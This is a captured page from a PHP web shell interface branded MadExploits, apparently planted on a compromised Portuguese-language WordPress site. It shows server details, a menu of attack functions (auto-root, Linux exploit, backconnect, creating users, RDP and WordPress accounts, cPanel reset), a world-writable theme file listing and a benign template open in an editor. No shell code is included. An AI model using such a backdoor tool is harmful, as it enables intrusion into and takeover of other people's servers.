Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php get_header(); ?> <?php while ( have_posts() ) : the_post(); ?> <div class="page-hero"> <h1><?php the_title(); ?></h1> <p class="breadcrumb"> <a href="<?php echo home_url(); ?>">Início</a> › <a href="<?php echo home_url('/noticias'); ?>">Notícias</a> › <?php the_title(); ?> </p> </div> <div class="page-content"> <div class="single-post-content"> <div class="post-meta"><?php echo get_the_date('d \d\e F \d\e Y'); ?></div> <?php if ( has_post_thumbnail() ) : ?> <?php the_post_thumbnail('large', ['class' => 'post-thumb']); ?> <?php endif; ?> <div class="entry-content"> <?php the_content(); ?> </div> <div style="margin-top:32px;"> <a href="<?php echo home_url('/noticias'); ?>" class="read-more">← Voltar para Notícias</a> </div> </div> </div> <?php endwhile; ?> <?php get_footer(); ?>
Close